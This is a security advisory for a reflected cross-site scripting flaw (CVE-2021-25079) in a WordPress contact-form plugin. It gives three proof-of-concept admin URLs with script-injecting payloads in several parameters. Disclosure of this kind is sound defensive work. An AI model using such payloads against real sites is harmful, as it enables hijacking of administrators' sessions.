Contact Form Entries < 1.2.4 – Reflected Cross-Site Scripting | CVE 2021-25079

Description

The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page

Proof of Concept

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=